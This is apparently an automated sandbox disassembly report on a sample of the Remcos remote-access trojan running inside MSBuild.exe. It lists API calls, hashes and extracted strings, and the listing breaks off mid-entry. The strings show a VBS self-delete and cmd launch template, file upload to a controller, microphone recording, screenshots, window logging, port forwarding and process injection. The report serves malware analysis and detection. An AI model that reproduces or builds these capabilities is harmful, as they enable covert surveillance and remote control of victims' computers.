                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                • String ID: Close
                                                • API String ID: 1657328048-3535843008
                                                • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                APIs
                                                Similarity
                                                • API ID: _free$Info
                                                • String ID:
                                                • API String ID: 2509303402-0
                                                • Opcode ID: 06a8a26f2c5a7b5fa394c6bff13e2c454eae2c5b2dbf51852f12c512b58d3eba
                                                • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                • Opcode Fuzzy Hash: 06a8a26f2c5a7b5fa394c6bff13e2c454eae2c5b2dbf51852f12c512b58d3eba
                                                • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                • __aulldiv.LIBCMT ref: 00407FE9
                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                Strings
                                                Similarity
                                                • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                • API String ID: 1884690901-3066803209
                                                • Opcode ID: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                • Opcode Fuzzy Hash: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                APIs
                                                • Sleep.KERNEL32(00001388), ref: 00409E62
                                                  • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                  • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                  • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                  • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                Strings
                                                Similarity
                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                • API String ID: 3795512280-3163867910
                                                • Opcode ID: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                • Opcode Fuzzy Hash: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                • _free.LIBCMT ref: 004500A6
                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                • _free.LIBCMT ref: 004500C8
                                                • _free.LIBCMT ref: 004500DD
                                                • _free.LIBCMT ref: 004500E8
                                                • _free.LIBCMT ref: 0045010A
                                                • _free.LIBCMT ref: 0045011D
                                                • _free.LIBCMT ref: 0045012B
                                                • _free.LIBCMT ref: 00450136
                                                • _free.LIBCMT ref: 0045016E
                                                • _free.LIBCMT ref: 00450175
                                                • _free.LIBCMT ref: 00450192
                                                • _free.LIBCMT ref: 004501AA
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 0041912D
                                                • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                Strings
                                                Similarity
                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                • API String ID: 489098229-65789007
                                                • Opcode ID: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                • Opcode Fuzzy Hash: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                APIs
                                                • connect.WS2_32(?,?,?), ref: 004042A5
                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                Strings
                                                Similarity
                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                • API String ID: 994465650-2151626615
                                                • Opcode ID: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                • Opcode Fuzzy Hash: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                APIs
                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                • ExitProcess.KERNEL32 ref: 0040C832
                                                Strings
                                                Similarity
                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                • API String ID: 1913171305-390638927
                                                • Opcode ID: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                • Opcode Fuzzy Hash: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                APIs
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                • Opcode Fuzzy Hash: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                APIs
                                                  • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                • GetLastError.KERNEL32 ref: 00454A96
                                                • __dosmaperr.LIBCMT ref: 00454A9D
                                                • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                • GetLastError.KERNEL32 ref: 00454AB3
                                                • __dosmaperr.LIBCMT ref: 00454ABC
                                                • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                • CloseHandle.KERNEL32(?), ref: 00454C26
                                                • GetLastError.KERNEL32 ref: 00454C58
                                                • __dosmaperr.LIBCMT ref: 00454C5F
                                                Strings
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 0040A456
                                                • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                • GetForegroundWindow.USER32 ref: 0040A467
                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                Strings
                                                Similarity
                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                • String ID: [${ User has been idle for $ minutes }$]
                                                • API String ID: 911427763-3954389425
                                                • Opcode ID: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                • Opcode Fuzzy Hash: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: 65535$udp
                                                • API String ID: 0-1267037602
                                                • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                APIs
                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                Strings
                                                Similarity
                                                • API ID: LongNamePath
                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                • API String ID: 82841172-425784914
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                • __dosmaperr.LIBCMT ref: 004393CD
                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                • __dosmaperr.LIBCMT ref: 0043940A
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                • __dosmaperr.LIBCMT ref: 0043945E
                                                • _free.LIBCMT ref: 0043946A
                                                • _free.LIBCMT ref: 00439471
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                • String ID:
                                                • API String ID: 2441525078-0
                                                APIs
                                                • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                • TranslateMessage.USER32(?), ref: 00404F30
                                                • DispatchMessageA.USER32(?), ref: 00404F3B
                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                • API String ID: 2956720200-749203953
                                                APIs
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                • String ID: <$@$@FG$@FG$Temp
                                                • API String ID: 1107811701-2245803885
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406705
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentProcess
                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                • API String ID: 2050909247-4145329354
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                • String ID:
                                                • API String ID: 221034970-0
                                                APIs
                                                • _free.LIBCMT ref: 00446DDF
                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                • _free.LIBCMT ref: 00446DEB
                                                • _free.LIBCMT ref: 00446DF6
                                                • _free.LIBCMT ref: 00446E01
                                                • _free.LIBCMT ref: 00446E0C
                                                • _free.LIBCMT ref: 00446E17
                                                • _free.LIBCMT ref: 00446E22
                                                • _free.LIBCMT ref: 00446E2D
                                                • _free.LIBCMT ref: 00446E38
                                                • _free.LIBCMT ref: 00446E46
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Eventinet_ntoa
                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                • API String ID: 3578746661-4192532303
                                                APIs
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DecodePointer
                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                • API String ID: 3527080286-3064271455
                                                APIs
                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                • Sleep.KERNEL32(00000064), ref: 00416688
                                                • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                • API String ID: 1462127192-2001430897
                                                APIs
                                                • _strftime.LIBCMT ref: 00401AD3
                                                  • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                • API String ID: 3809562944-3643129801
                                                APIs
                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                • waveInStart.WINMM ref: 00401A81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                • String ID: XCG$`=G$x=G
                                                • API String ID: 1356121797-903574159
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                  • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                  • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                  • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                • TranslateMessage.USER32(?), ref: 0041C9FB
                                                • DispatchMessageA.USER32(?), ref: 0041CA05
                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                • String ID: Remcos
                                                • API String ID: 1970332568-165870891
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                APIs
                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                • __alloca_probe_16.LIBCMT ref: 00452C91
                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                • __freea.LIBCMT ref: 00452DAA
                                                • __freea.LIBCMT ref: 00452DB6
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                • String ID:
                                                • API String ID: 201697637-0
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                • _free.LIBCMT ref: 00444714
                                                • _free.LIBCMT ref: 0044472D
                                                • _free.LIBCMT ref: 0044475F
                                                • _free.LIBCMT ref: 00444768
                                                • _free.LIBCMT ref: 00444774
                                                Strings
                                                Memory Dump Source
